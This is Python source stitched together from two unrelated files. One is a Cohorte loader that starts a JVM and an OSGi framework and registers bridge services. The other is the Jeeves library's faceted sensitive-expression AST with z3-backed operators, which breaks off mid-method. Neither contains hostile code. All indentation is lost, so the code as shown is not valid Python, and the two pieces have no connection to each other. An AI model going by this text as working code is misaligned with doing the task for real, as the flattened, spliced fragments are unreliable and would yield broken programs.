def __init__(self):
"""
Sets up members
"""
# Injected services
self._java = None
self._config = None
self._finder = None
self._repository = None
# Pelix bundle context
self._context = None
# OSGi Framework
self._osgi = None
# Bridge service registration
self._bridge_reg = None
@staticmethod
def _setup_vm_properties(properties):
"""
Sets up the JVM system properties dictionary (not the arguments)
:param properties: Configured properties
:return: VM properties dictionary
"""
# Prepare the dictionary
return properties.copy() if properties else {}
def _setup_osgi_properties(self, properties, allow_bridge, extra_packages=None):
"""
Sets up the OSGi framework properties and converts them into a Java
HashMap.
:param properties: Configured framework properties
:param allow_bridge: If True, the bridge API package will be exported
by the framework.
:return: The framework properties as a Java Map
"""
osgi_properties = self._java.load_class("java.util.HashMap")()
for key, value in properties.items():
if value is not None:
osgi_properties.put(key, str(value))
# Inherit some Pelix properties
for key in (cohorte.PROP_HOME, cohorte.PROP_BASE,
cohorte.PROP_UID, cohorte.PROP_NAME,
cohorte.PROP_NODE_UID, cohorte.PROP_NODE_NAME,
cohorte.PROP_NODE_DATA_DIR,
cohorte.PROP_DUMPER_PORT,
cohorte.PROP_FORKER_HTTP_PORT,
herald.FWPROP_PEER_UID, herald.FWPROP_PEER_NAME,
herald.FWPROP_NODE_UID, herald.FWPROP_NODE_NAME,
herald.FWPROP_APPLICATION_ID):
value = self._context.get_property(key)
if value is not None:
# Avoid empty values
osgi_properties.put(key, str(value))
# Special case: Herald groups (comma-separated list)
value = self._context.get_property(herald.FWPROP_PEER_GROUPS)
if value:
osgi_properties.put(herald.FWPROP_PEER_GROUPS,
','.join(str(group) for group in value))
new_extra_packages = None
if allow_bridge:
# Prepare the "extra system package" framework property
if extra_packages:
new_extra_packages = "{0}; version=1.0.0, {1}; version=1.0.0,{2}".format(
PYTHON_BRIDGE_BUNDLE_API, HERALD_EVENT_BUNDLE_API, extra_packages)
else:
new_extra_packages = "{0}; version=1.0.0, {1}; version=1.0.0".format(
PYTHON_BRIDGE_BUNDLE_API, HERALD_EVENT_BUNDLE_API)
else:
if extra_packages:
new_extra_packages = "{0}".format(extra_packages)
if new_extra_packages:
_logger.debug(
"Framework extra-packages={0}".format(new_extra_packages))
osgi_properties.put(
FRAMEWORK_SYSTEMPACKAGES_EXTRA, new_extra_packages)
else:
_logger.debug("No extra-packages!")
return osgi_properties
def _start_jvm(self, vm_args, classpath, properties):
"""
Starts the JVM, with the given file in the class path
:param vm_args: JVM arguments
:param classpath: A list of JAR files
:param properties: Java system properties
:raise KeyError: Error starting the JVM
:raise ValueError: Invalid JAR file
"""
# Start a JVM if necessary
if not self._java.is_running():
# Arguments given to the Java runner
java_args = []
if vm_args:
# VM specific arguments first
java_args.extend(vm_args)
# DEBUG: Remote debug server
# java_args.append("-Xdebug")
# java_args.append("-Xrunjdwp:transport=dt_socket,"
# "server=y,suspend=y,address=5005")
# Set the class path as a parameter
java_args.append(self._java.make_jvm_classpath(classpath))
# Prepare the JVM properties definitions
for key, value in self._setup_vm_properties(properties).items():
java_args.append(self._java.make_jvm_property(key, value))
self._java.start(None, *java_args)
else:
# Add the JAR to the class path
for jar_file in classpath:
self._java.add_jar(jar_file)
def _close_osgi(self):
"""
Stops the OSGi framework and clears all references to it
"""
# Unregister services
if self._bridge_reg is not None:
self._bridge_reg.unregister()
self._bridge_reg = None
# Stop the framework
if self._osgi is not None:
self._osgi.stop()
self._osgi = None
def _register_bridge(self, context, java_configuration):
"""
Instantiates and registers the iPOJO components instantiation handler
inside the OSGi framework
:param context: An OSGi bundle context
:param java_configuration: The Java boot configuration
"""
# Make a Java proxy of the bridge
bridge_java = self._java.make_proxy(
PyBridge(self._context, self._java, java_configuration,
self._config, self._bridge_callback))
# Register it to the framework
self._bridge_reg = context.registerService(
PyBridge.JAVA_INTERFACE, bridge_java, None)
def _register_herald_bridge(self, context):
"""
Registers the Herald EventFactory service inside the OSGi framework
:param context: An OSGi bundle context
"""
# Make a Java proxy of the Herald bridge
herald_java = self._java.make_proxy(EventFactory(self._java))
# Register it to the framework
props = self._java.load_class("java.util.Hashtable")()
props.put("service.ranking", 1000)
self._bridge_reg = context.registerService(
EventFactory.JAVA_INTERFACE, herald_java, props)
@staticmethod
def _bridge_callback(success, message):
"""
Called back by the Python-Java bridge
:param success: If True, all components have been started, else an
error occurred
:param message: A call back message
"""
if success:
_logger.debug("Bridge success: %s", message)
else:
_logger.warning("Bridge error: %s", message)
def _find_osgi_jar(self, osgi_jar, symbolic_name):
"""
Looks for the OSGi framework JAR file matching the given parameters
:param osgi_jar: An OSGi framework JAR file name
:param symbolic_name: An OSGi framework symbolic name
:return: A (file name, framework factory) tuple
:raise ValueError: No OSGi framework found
"""
try:
# We've been given a specific JAR file or symbolic name
osgi_bundle = self._repository.get_artifact(symbolic_name,
filename=osgi_jar)
except ValueError:
# Bundle not found
for bundle in self._repository.filter_services(FRAMEWORK_SERVICE):
# Get the first found framework
osgi_bundle = bundle
break
else:
# No match found
raise ValueError("No OSGi framework found in repository")
# Found !
return osgi_bundle.file, osgi_bundle.get_service(FRAMEWORK_SERVICE)
def load(self, configuration):
"""
Loads the Java OSGi isolate
:param configuration: Isolate configuration dictionary (required)
:raise KeyError: A mandatory property is missing
:raise ValueError: Invalid parameter/file encountered or the JVM
can't be loaded
:raise BundleException: Error installing a bundle
:raise Exception: Error instantiating a component
"""
if not configuration:
raise KeyError("A configuration is required to load a "
"Java OSGi isolate")
# Parse the configuration (boot-like part) -> Might raise error
java_config = self._config.load_boot_dict(configuration)
# Find the OSGi JAR file to use
osgi_jar_file, factory_name = self._find_osgi_jar(
configuration.get('osgi_jar'), configuration.get('osgi_name'))
_logger.debug("Using OSGi JAR file: %s", osgi_jar_file)
# Prepare the VM arguments
classpath = [osgi_jar_file]
# Find the bridge API JAR file
api_jar = self._repository.get_artifact(PYTHON_BRIDGE_BUNDLE_API)
if api_jar:
# Add the bundle to the class path...
classpath.append(api_jar.file)
else:
raise Exception("Python bridge API bundle is missing")
# Find the Herald API JAR file
herald_event_jar = self._repository.get_artifact(
HERALD_EVENT_BUNDLE_API)
if herald_event_jar:
# Add the bundle to the class path...
classpath.append(herald_event_jar.file)
else:
raise Exception("Herald Event API bundle is missing")
# Start the JVM
_logger.debug("Starting JVM...")
self._start_jvm(configuration.get('vm_args'), classpath,
configuration.get('vm_properties'))
# Patch for Mac OS X:
# GUI library must be loaded early in the main thread
if sys.platform == 'darwin':
# We need this dark magic stuff for dummy OSes
self._java.load_class("java.awt.Color")
# Load the FrameworkFactory implementation
_logger.debug("Loading OSGi FrameworkFactory: %s", factory_name)
factory_class = self._java.load_class(factory_name)
factory = factory_class()
# Retrieve extra packages
vm_args = configuration.get('vm_args')
tmp = []
if vm_args:
tmp = [vm_arg for vm_arg in configuration.get('vm_args')
if FRAMEWORK_SYSTEMPACKAGES_EXTRA in vm_arg]
extra_packages = ""
if len(tmp) > 0:
extra_packages = tmp[0].split("=")[1]
# Framework properties
osgi_properties = self._setup_osgi_properties(java_config.properties,
api_jar is not None,
extra_packages)
# Start a framework, with the given properties
self._osgi = factory.newFramework(osgi_properties)
self._osgi.start()
context = self._osgi.getBundleContext()
# Register the Herald Event API bridge
self._register_herald_bridge(context)
# Install bundles
java_bundles = []
# Install the bridge
bundle = self._repository.get_artifact(PYTHON_BRIDGE_BUNDLE)
if not bundle:
_logger.warning("No Python bridge bundle found")
else:
_logger.debug("Installing PyBridge bundle: %s", bundle.url)
java_bundles.append(context.installBundle(bundle.url))
# Install the configured bundles
for bundle_conf in java_config.bundles:
bundle = self._repository.get_artifact(
bundle_conf.name, bundle_conf.version, bundle_conf.filename)
if not bundle:
if not bundle_conf.optional:
raise ValueError("Bundle not found: {0}"
.format(bundle_conf))
else:
_logger.warning("Bundle not found: %s", bundle_conf)
elif bundle.file == osgi_jar_file:
_logger.debug("OSGi framework is already installed.")
else:
_logger.debug("Installing Java bundle %s (is_fragment=%s)...", bundle.name, bundle.is_fragment())
b = context.installBundle(bundle.url)
if not bundle.is_fragment():
java_bundles.append(b)
try:
# Start the bundles
for bundle in java_bundles:
_logger.debug("Starting %s...", bundle.getSymbolicName())
bundle.start()
except jpype.JavaException as ex:
# Log the bundle exception and its cause
_logger.error("Error starting bundle: %s",
ex.__javaobject__.toString())
cause = ex.__javaobject__.getCause()
while cause is not None:
_logger.error("... caused by: %s", cause.toString())
cause = cause.getCause()
# Raise exception to the caller
raise
# Start the component instantiation handler
# (once all bundles have been installed)
self._register_bridge(context, java_config)
def wait(self):
"""
Waits for the isolate to stop
"""
if not self._osgi:
# Nothing to do
return
# Wait for the OSGi framework to stop
try:
self._osgi.waitForStop(0)
except Exception as ex:
_logger.exception("Error waiting for the OSGi framework "
"to stop: %s", ex)
raise
@Validate
def validate(self, context):
"""
Component validated
:param context: The bundle context
"""
# Update the finder
self._finder.update_roots()
# Store the framework access
self._context = context
@Invalidate
def invalidate(self, context):
"""
Component invalidated
:param context: The bundle context
"""
# Stop the framework
self._close_osgi()
# Clear the JVM
self._java.stop()
# Clear the framework access
self._context = None
| |
''' This defines the abstract syntax tree for sensitive expressions.
'''
import operator
import z3
import JeevesLib
import traceback
import types
import env.VarEnv
import env.PolicyEnv
import env.PathVars
import env.WritePolicyEnv
import threading
from collections import defaultdict
def facetApply(f, opr):
if isinstance(f, Facet):
return create_facet(f.cond, facetApply(f.thn, opr)
, facetApply(f.els, opr))
elif isinstance(f, Constant):
return Constant(opr(f.v))
elif isinstance(f, FObject):
return FObject(opr(f.v))
def create_facet(cond, left, right):
if isinstance(left, Constant) and isinstance(right, Constant) and left.v == right.v:
return left
if isinstance(left, FObject) and isinstance(right, FObject) \
and left.v is right.v:
return left
return Facet(cond, left, right)
def facetJoin(f0, f1, opr):
if isinstance(f0, Facet) or isinstance(f0.v, types.MethodType):
thn = facetJoin(f0.thn, f1, opr)
els = facetJoin(f0.els, f1, opr)
return create_facet(f0.cond, thn, els)
elif isinstance(f1, Facet) or isinstance(f1.v, types.MethodType):
thn = facetJoin(f0, f1.thn, opr)
els = facetJoin(f0, f1.els, opr)
return create_facet(f1.cond, thn, els)
else:
# NOTE(JY): Sometimes we still have an Expr in here if we can't yet
# resolve it...
return Constant(opr(f0.v, f1.v))
class JeevesState:
def __init__(self):
pass
def init(self):
# Cache of concretized values.
self._concretecache = defaultdict(env.ConcreteCache.ConcreteCache)
# Regular environments.
self._varenv = defaultdict(env.VarEnv.VarEnv)
self._pathenv = defaultdict(env.PathVars.PathVars)
self._policyenv = defaultdict(env.PolicyEnv.PolicyEnv)
self._writeenv = defaultdict(env.WritePolicyEnv.WritePolicyEnv)
self._all_labels = defaultdict(dict)
self._solverstate = defaultdict()
# Logging.
self._log_policies = False
self._policy_log_filehandle = None
self._num_concretize = 0
self._num_labels = 0
# self._num_policies = 0
# Early concretization optimization.
self._viewer = defaultdict(FNull)
@property
def concretecache(self):
return self._concretecache[threading.current_thread()]
@property
def num_concretize(self):
return self._num_concretize
@property
def num_labels(self):
return self._num_labels
# @property
# def num_policies(self):
# return self._num_policies
def set_log_policies(self, filehandle):
self._log_policies = True
self._policy_log_filehandle = filehandle
def log_policies(self):
f = self._policy_log_filehandle
if self._log_policies and self._num_concretize > 0:
f.write("***\n")
f.write("Concretizations so far: " + \
str(self._num_concretize) + "\n")
f.write("Labels so far: " + str(self._num_labels) + "\n")
f.write("Average labels: " + \
str(self._num_labels / (self._num_concretize * 1.0)) + "\n")
# f.write("Policies so far: " + str(self._num_policies) + "\n")
# f.write("Average policies: " + \
# str(self._num_policies / (self._num_concretize * 1.0)) + "\n")
f.write("***\n")
f.write("\n")
def log_counts(self, label_count):
if self._log_policies:
self._num_concretize += 1
f = self._policy_log_filehandle
assert(f != None)
f.write("***\n")
self._num_labels += label_count
f.write("Labels: " + str(label_count) + "\n")
f.write("***\n")
def clear_policy_count(self):
self._num_concretize = 0
self._num_labels = 0
# self._num_policies = 0
@property
def varenv(self):
return self._varenv[threading.current_thread()]
@property
def pathenv(self):
return self._pathenv[threading.current_thread()]
@property
def policyenv(self):
return self._policyenv[threading.current_thread()]
@property
def writeenv(self):
return self._writeenv[threading.current_thread()]
@property
def all_labels(self):
return self._all_labels[threading.current_thread()]
@property
def solverstate(self):
if self._solverstate.has_key(threading.current_thread()):
return self._solverstate[threading.current_thread()]
else:
return None
def reset_solverstate(self, ctxt):
self._solverstate[threading.current_thread()] = \
env.PolicyEnv.SolverState(self.policyenv.policies, ctxt)
def clear_solverstate(self):
self._solverstate[threading.current_thread()] = None
@property
def viewer(self):
return self._viewer[threading.current_thread()]
def set_viewer(self, viewer):
self._viewer[threading.current_thread()] = viewer
def reset_viewer(self):
self._viewer[threading.current_thread()] = FNull()
jeevesState = JeevesState()
'''
Sensitive expressions.
'''
class FExpr(object):
def vars(self):
return NotImplemented
def eval(self, env):
return NotImplemented
def z3Node(self):
return NotImplemented
def getChildren(self):
return NotImplemented
# Return a version of yourself with the write-associated labels remapped to
# point to the new policy in addition to the previous policies.
def remapLabels(self, policy, writer):
return NotImplemented
def prettyPrint(self, indent=""):
return "%s%s\n%s" % (indent, type(self).__name__,
"\n".join(child.prettyPrint(indent + " ")
for child in self.getChildren()))
'''
Sensitive Boolean expressions.
'''
def __eq__(l, r):
return Eq(l, fexpr_cast(r))
def __ne__(l, r):
return Not(Eq(l, fexpr_cast(r)))
# The & operator
def __and__(l, r):
return And(l, fexpr_cast(r))
def __rand__(r, l):
return And(fexpr_cast(l), r)
# The | operator
def __or__(l, r):
return Or(l, fexpr_cast(r))
def __ror__(r, l):
return Or(fexpr_cast(l), r)
'''
Integer expressions.
'''
def __add__(l, r):
return Add(l, fexpr_cast(r))
def __radd__(r, l):
return Add(fexpr_cast(l), r)
def __sub__(l, r):
return Sub(l, fexpr_cast(r))
def __rsub__(r, l):
return Sub(fexpr_cast(l), r)
def __mul__(l, r):
return Mult(l, fexpr_cast(r))
def __rmul__(r, l):
return Mult(fexpr_cast(l), r)
def __div__(l, r):
return Div(l, fexpr_cast(r))
def __rdiv__(r, l):
return Div(fexpr_cast(l), r)
def __mod__(l, r):
return Mod(l, fexpr_cast(r))
def __rmod__(r, l):
return Mod(fexpr_cast(l), r)
def __abs__(v):
if isinstance(v, FExpr):
return JeevesLib.jif(v > 0, lambda:v, lambda:0 - v)
return abs(v)
# TODO bitwise operations? do we care?
def __lt__(l, r):
return Lt(l, fexpr_cast(r))
def __gt__(l, r):
return Gt(l, fexpr_cast(r))
def __le__(l, r):
return LtE(l, fexpr_cast(r))
def __ge__(l, r):
return GtE(l, fexpr_cast(r))
class CannotEvalException(Exception):
pass
def get_var_by_name(var_name):
v = Var()
v.name = var_name
return v
class Var(FExpr):
counter = 0
def __init__(self, name=None, uniquify=True):
if name:
if uniquify:
self.name = "v%d_%s" % (Var.counter, name)
else:
self.name = name
else:
self.name = "v%d" % Var.counter
self.type = bool
Var.counter += 1
def eval(self, env):
try:
return env[self]
except IndexError:
raise CannotEvalException("Variable %s is not in path environment" \
% self)
def remapLabels(self, policy, writer):
return self
def __str__(self):
return self.name
def vars(self):
return {self}
def z3Node(self):
return z3.Bool(self.name)
def getChildren(self):
return []
def partialEval(self, env={}, unassignedOkay=False):
if self.name in env:
return Constant(env[self.name])
else:
return Facet(self, Constant(True), Constant(False))
def prettyPrint(self, indent=""):
return indent + self.name
def __getstate__(self):
return self.name
# helper methods for faceted __setattr__
def get_objs_in_faceted_obj(f, d, env):
if isinstance(f, Facet):
if f.cond.name in env:
if env[f.cond.name]:
get_objs_in_faceted_obj(f.thn, d, env)
else:
get_objs_in_faceted_obj(f.els, d, env)
else:
get_objs_in_faceted_obj(f.thn, d, env)
get_objs_in_faceted_obj(f.els, d, env)
elif isinstance(f, FObject):
d[id(f.v)] = f.v
else:
raise TypeError("wow such error: attribute access for non-object type; %s"
% f.__class__.__name__)
def replace_obj_attributes(f, obj, oldvalue, newvalue, env):
if isinstance(f, Facet):
if f.cond.name in env:
if env[f.cond.name]:
return replace_obj_attributes(f.thn, obj, oldvalue, newvalue, env)
else:
return replace_obj_attributes(f.els, obj, oldvalue, newvalue, env)
else:
return Facet(f.cond,
replace_obj_attributes(f.thn, obj, oldvalue, newvalue, env),
replace_obj_attributes(f.els, obj, oldvalue, newvalue, env))
elif f.v is obj:
return newvalue
else:
return oldvalue
'''
Facets.
'''
class Facet(FExpr):
def __init__(self, cond, thn, els):
assert isinstance(cond, Var)
self.__dict__['cond'] = cond
self.__dict__['thn'] = fexpr_cast(thn)
self.__dict__['els'] = fexpr_cast(els)
# Note (TJH): idiomatic python does lots of automatic casts to bools,
# especially to check if an integer is nonzero, for instance. We might
# want to consider casting
if self.cond.type != bool:
raise TypeError("Condition on Facet should be a bool but is type %s."
% self.cond.type.__name__)
# Note (TJH): Ordinary Python would of course allow these types to be
# distinct, but that sounds pretty annoying to support on our end.
# TODO: Unassigned makes things super-awkward, we need to figure that out.
# For now, just ignore them.
#if (self.thn.type != None and self.els.type != None and
# self.thn.type != self.els.type):
# raise TypeError("Condition on both sides of a Facet must have the "
# "same type, they are %s and %s."
# % (self.thn.type.__name__, self.els.type.__name__))
self.__dict__['type'] = self.thn.type or self.els.type
def eval(self, env):
return self.thn.eval(env) if self.cond.eval(env) else self.els.eval(env)
def vars(self):
return self.cond.vars().union(self.thn.vars()).union(self.els.vars())
def z3Node(self):
return z3.If(self.cond.z3Node(), self.thn.z3Node(), self.els.z3Node())
def getChildren(self):
return [self.cond, self.thn, self.els]
def remapLabels(self, policy, writer):
if isinstance(self.cond, Var):
newCond = jeevesState.writeenv.addWritePolicy(
self.cond, policy, writer)
else:
newCond = self.cond.remapLabels(policy, writer)
return Facet(newCond
, self.thn.remapLabels(policy, writer)
, self.els.remapLabels(policy, writer))
def partialEval(self, env={}, unassignedOkay=False):
if self.cond.name in env:
return self.thn.partialEval(env, unassignedOkay) if env[self.cond.name] else self.els.partialEval(env, unassignedOkay)
else:
true_env = dict(env)
true_env[self.cond.name] = True
false_env = dict(env)
false_env[self.cond.name] = False
return create_facet(self.cond, self.thn.partialEval(true_env, unassignedOkay),
self.els.partialEval(false_env, unassignedOkay))
def prettyPrint(self, indent=""):
return "< " + self.cond.prettyPrint() + " ? " + self.thn.prettyPrint() + " : " + self.els.prettyPrint() + " >"
def __str__(self):
return self.prettyPrint()
def __call__(self, *args, **kw):
return JeevesLib.jif(self.cond,
lambda:self.thn(*args, **kw), lambda:self.els(*args, **kw))
# called whenever an attribute that does not exist is accessed
def __getattr__(self, attribute):
if JeevesLib.jeevesState.pathenv.hasPosVar(self.cond):
return getattr(self.thn, attribute)
elif JeevesLib.jeevesState.pathenv.hasNegVar(self.cond):
return getattr(self.els, attribute)
return Facet(self.cond,
getattr(self.thn, attribute),
getattr(self.els, attribute))
def __setattr__(self, attribute, value):
if attribute in self.__dict__:
self.__dict__[attribute] = value
else:
env = jeevesState.pathenv.getEnv()
value = fexpr_cast(value)
objs = {}
get_objs_in_faceted_obj(self, objs, env)
for _, obj in objs.iteritems():
if hasattr(obj, attribute):
old_val = getattr(obj, attribute)
else:
old_val = Unassigned("attribute '%s'" % attribute)
t = replace_obj_attributes(self, obj, old_val, value, env)
setattr(obj, attribute, t)
def __getitem__(self, attribute):
if JeevesLib.jeevesState.pathenv.hasPosVar(self.cond):
return self.thn[attribute]
elif JeevesLib.jeevesState.pathenv.hasNegVar(self.cond):
return self.els[attribute]
return Facet(self.cond, self.thn[attribute], self.els[attribute])
def __setitem__(self, attribute, value):
env = jeevesState.pathenv.getEnv()
value = fexpr_cast(value)
objs = {}
get_objs_in_faceted_obj(self, objs, env)
for _, obj in objs.iteritems():
t = replace_obj_attributes(self, obj, obj[attribute], value, env)
obj[attribute] = t
def __eq__(self, other):
other = fexpr_cast(other)
if self.type == object or other.type == object:
return JeevesLib.jif(self.cond, lambda : self.thn == other,
lambda : self.els == other)
else:
return Eq(self, other)
def __ne__(self, other):
other = fexpr_cast(other)
if self.type == object or other.type == object:
return JeevesLib.jif(self.cond, lambda : self.thn != other,
lambda : self.els != other)
else:
return Not(Eq(self, other))
def __lt__(self, other):
other = fexpr_cast(other)
if self.type == object or other.type == object:
return JeevesLib.jif(self.cond, lambda : self.thn < other,
lambda : self.els < other)
else:
return Lt(self, other)
def __gt__(self, other):
other = fexpr_cast(other)
if self.type == object or other.type == object:
return JeevesLib.jif(self.cond, lambda : self.thn > other,
lambda : self.els > other)
else:
return Gt(self, other)
def __le__(self, other):
other = fexpr_cast(other)
if self.type == object or other.type == object:
return JeevesLib.jif(self.cond, lambda : self.thn <= other,
lambda : self.els <= other)
else:
return LtE(self, other)
def __ge__(self, other):
other = fexpr_cast(other)
if self.type == object or other.type == object:
return JeevesLib.jif(self.cond, lambda : self.thn >= other,
lambda : self.els >= other)
else:
return GtE(self, other)
def __len__(self):
if self.type == object:
return JeevesLib.jif(self.cond,
lambda : self.thn.__len__(),
lambda : self.els.__len__())
else:
raise TypeError("cannot take len of non-object; type %s" % self.type.__name__)
def __getstate__(self):
return "<%s:%s?%s>" % \
(self.cond.__getstate__(), self.thn.__getstate__(),
self.els.__getstate__())
class Constant(FExpr):
def __init__(self, v):
# TODO
#assert not isinstance(v, FExpr)
self.v = v
self.type = type(v)
def eval(self, env):
return self.v
def vars(self):
return set()
def z3Node(self):
return self.v
def getChildren(self):
return []
def remapLabels(self, policy, writer):
return self
def partialEval(self, env={}, unassignedOkay=False):
return self
def prettyPrint(self, indent=""):
return indent + "const:" + repr(self.v)
def __call__(self, *args, **kw):
return self.v(*args, **kw)
def __getstate__(self):
return "(Const:%s)" + repr(self.v)
'''
Binary expressions.
'''
class BinaryExpr(FExpr):
def __init__(self, left, right):
self.left = left
self.right = right
self.type = self.ret_type
def vars(self):
return self.left.vars().union(self.right.vars())
def getChildren(self):
return [self.left, self.right]
def partialEval(self, env={}, unassignedOkay=False):
left = self.left.partialEval(env, unassignedOkay)
right = self.right.partialEval(env, unassignedOkay)
return facetJoin(left, right, self.opr)
class UnaryExpr(FExpr):
def __init__(self, sub):
self.sub = sub
self.type = self.ret_type
def vars(self):
return self.sub.vars()
def getChildren(self):
return [self.sub]
def partialEval(self, env={}, unassignedOkay=False):
sub = self.sub.partialEval(env, unassignedOkay)
return facetApply(sub, self.opr)
'''
Operators.
'''
class Add(BinaryExpr):
opr = staticmethod(operator.add)
ret_type = int
def eval(self, env):
return self.left.eval(env) + self.right.eval(env)
def z3Node(self):
return self.left.z3Node() + self.right.z3Node()
def remapLabels(self, policy, writer):
return Add(
self.left.remapLabels(policy, writer)
, self.right.remapLabels(policy, writer))
class Sub(BinaryExpr):
opr = staticmethod(operator.sub)
ret_type = int
def eval(self, env):
return self.left.eval(env) - self.right.eval(env)
def z3Node(self):
return self.left.z3Node() - self.right.z3Node()
def remapLabels(self, policy, writer):
return Sub(
self.left.remapLabels(policy, writer)
, self.right.remapLabels(policy, writer))
class Mult(BinaryExpr):
opr = staticmethod(operator.mul)
ret_type = int
def eval(self, env):
return self.left.eval(env) * self.right.eval(env)
def z3Node(self):
return self.left.z3Node() * self.right.z3Node()
def remapLabels(self, policy, writer):
return Mult(
self.left.remapLabels(policy, writer)
, self.right.remapLabels(policy, writer))
class Div(BinaryExpr):
opr = staticmethod(operator.div)
ret_type = int
def eval(self, env):
return self.left.eval(env) / self.right.eval(env)
def z3Node(self):
return NotImplemented
def remapLabels(self, policy, writer):
return Div(
self.left.remapLabels(policy, writer)
, self.right.remapLabels(policy, writer))
class Mod(BinaryExpr):
opr = staticmethod(operator.mod)
ret_type = int
def eval(self, env):
return self.left.eval(env) % self.right.eval(env)
def z3Node(self):
return NotImplemented
def remapLabels(self, policy, writer):
return Mod(
self.left.remapLabels(policy, writer)
, self.right.remapLabels(policy, writer))
# Not sure if bitwise operations are supported by Z3?
class BitAnd(BinaryExpr):
opr = staticmethod(operator.and_)
ret_type = int
def eval(self, env):
return self.left.eval(env) & self.right.eval(env)
def z3Node(self):
return NotImplemented
def remapLabels(self, policy, writer):
return BitAnd(
self.left.remapLabels(policy, writer)
, self.right.remapLabels(policy, writer))
class BitOr(BinaryExpr):
opr = staticmethod(operator.or_)
ret_type = int
def eval(self, env):
return self.left.eval(env) | self.right.eval(env)
def z3Node(self):
return NotImplemented
def remapLabels(self, policy, writer):
return BitOr(
self.left.remapLabels(policy, writer)
, self.right.remapLabels(policy, writer))
class LShift(BinaryExpr):
opr = staticmethod(operator.ilshift)
ret_type = int
def eval(self, env):
return self.left.eval(env) << self.right.eval(env)
def z3Node(self):
return NotImplemented
def remapLabels(self, policy, writer):
return LShift(
self.left.remapLabels(policy, writer)
, self.right.remapLabels(policy, writer))
class RShift(BinaryExpr):
opr = staticmethod(operator.irshift)
ret_type = int
def eval(self, env):
return self.left.eval(env) >> self.right.eval(env)
def z3Node(self):
return NotImplemented
def remapLabels(self, policy, writer):
return RShift(
self.left.remapLabels(policy, writer)
, self.right.remapLabels(policy, writer))
# Boolean operations
class And(BinaryExpr):
opr = staticmethod(operator.and_)
ret_type = bool
def eval(self, env):
return self.left.eval(env) and self.right.eval(env)
def z3Node(self):
return z3.And(self.left.z3Node(), self.right.z3Node())
def remapLabels(self, policy, writer):
return And(
self.left.remapLabels(policy, writer)
, self.right.remapLabels(policy, writer))
class Or(BinaryExpr):
opr = staticmethod(operator.or_)
ret_type = bool
def eval(self, env):
return self.left.eval(env) or self.right.eval(env)
def z3Node(self):
return z3.Or(self.left.z3Node(), self.right.z3Node())
def remapLabels(self, policy, writer):
return Or(
self.left.remapLabels(policy, writer)
, self.right.remapLabels(policy, writer))
class Not(UnaryExpr):
opr = staticmethod(operator.not_)
ret_type = bool
def eval(self, env):
return not self.sub.eval(env)
def z3Node(self):
return z3.Not(self.sub.z3Node())
def remapLabels(self, policy, writer):
return Not(self.sub.remapLabels(policy, writer))
def __getstate__(self):
return "(Not(%s))" % self.sub.__getstate__()
# Doesn't correspond to a Python operator but is useful
class Implies(BinaryExpr):
opr = staticmethod(lambda x, y : (not x) or y)
ret_type = bool
def eval(self, env):
return (not self.left.eval(env)) or self.right.eval(env)
def z3Node(self):
return z3.Implies(self.left.z3Node(), self.right.z3Node())
def remapLabels(self, policy, writer):
return Implies(
self.left.remapLabels(policy, writer)
, self.right.remapLabels(policy, writer))
# Comparison operations
class Eq(BinaryExpr):
opr = staticmethod(operator.eq)
ret_type = bool
def eval(self, env):
return self.left.eval(env) == self.right.eval(env)
def z3Node(self):
return self.left.z3Node() == self.right.z3Node()
def remapLabels(self, policy, writer):
return Eq(
self.left.remapLabels(policy, writer)
, self.right.remapLabels(policy, writer))
def __getstate__(self):
return "(Eq(%s)(%s))" % \
(self.left.__getstate__(), self.right.__getstate__())
class Lt(BinaryExpr):
opr = staticmethod(operator.lt)
ret_type = bool
def eval(self, env):
return self.left.eval(env) < self.right.eval(env)
def z3Node(self):
return self.left.z3Node() < self.right.z3Node()
def remapLabels(self, policy, writer):
return Lt(
self.left.remapLabels(policy, writer)
, self.right.remapLabels(policy, writer))
def __getstate__(self):
return "(Lt(%s)(%s))" % \
(self.left.__getstate__(), self.right.__getstate__())
class LtE(BinaryExpr):
opr = staticmethod(operator.le)
ret_type = bool
def eval(self, env):
return self.left.eval(env) <= self.right.eval(env)
def z3Node(self):
return self.left.z3Node() <= self.right.z3Node()
def remapLabels(self, policy, writer):
return LtE(
self.left.remapLabels(policy, writer)
, self.right.remapLabels(policy, writer))
def __getstate__(self):
return "(LtE(%s)(%s))" % \
(self.left.__getstate__(), self.right.__getstate__())
class Gt(BinaryExpr):
opr = staticmethod(operator.gt)
ret_type = bool
def eval(self, env):
return self.left.eval(env) > self.right.eval(env)
def z3Node(self):
return self.left.z3Node() > self.right.z3Node()
def remapLabels(self, policy, writer):
return Gt(
self.left.remapLabels(policy, writer)
, self.right.remapLabels(policy, writer))
def __getstate__(self):
return "(Gt(%s)(%s))" % \
(self.left.__getstate__(), self.right.__getstate__())
class GtE(BinaryExpr):
opr = staticmethod(operator.ge)
ret_type = bool
def eval(self, env):
return self.left.eval(env) >= self.right.eval(env)
def z3Node(self):
return self.left.z3Node() >= self.right.z3Node()
def remapLabels(self, policy, writer):
return GtE(
self.left.remapLabels(policy, writer)
, self.right.remapLabels(policy, writer))
def __getstate__(self):
return "(GtE(%s)(%s))" % \
(self.left.__getstate__(), self.right.__getstate__())
class Unassigned(FExpr):
def __init__(self, thing_not_found):
self.type = None
self.thing_not_found = thing_not_found
def eval(self, env):
raise self.getException()
def z3Node(self):
pass #TODO ?? what goes here
def getChildren(self):
return []
def remapLabels(self, policy):
return self
def vars(self):
return set()
def remapLabels(self, policy, writer):
return self
def partialEval(self, env={}, unassignedOkay=False):
if unassignedOkay:
return self
else:
raise self.getException()
def getException(self):
return Exception("wow such error: %s does not exist." % (self.thing_not_found,))
def __call__(self, *args, **kwargs):
raise self.getException()
def __getattr__(self, attr):
#raise self.getException()
return Unassigned(self.thing_not_found)
def __getstate__(self):
return "(Unassigned:%s)" % repr(self)
# TODO(TJH): figure out the correct implementation of this
def is_obj(o):
return isinstance(o, list) or isinstance(o, tuple) or hasattr(o, '__dict__') or o is None
# helper method
def fexpr_cast(a):
if isinstance(a, FExpr):
return a
elif isinstance(a, list):
return FObject(JeevesLib.JList(a))
elif is_obj(a):
return FObject(a)
else:
return Constant(a)
class FObject(FExpr):
def __init__(self, v):
assert not isinstance(v, JeevesLib.Namespace)
assert not isinstance(v, FObject)
self.__dict__['v'] = v
self.__dict__['type'] = object
def eval(self, env):
if isinstance(self.v, JeevesLib.JList):
return self.v.l.eval(env)
elif isinstance(self.v, JeevesLib.JList2):
return self.v.eval(env)
else:
return self.v
def vars(self):
if isinstance(self.v, JeevesLib.JList):
return self.v.l.vars()
elif isinstance(self.v, JeevesLib.JList2):
return self.v.vars()
else:
return set()
def z3Node(self):
return id(self)
def getChildren(self):
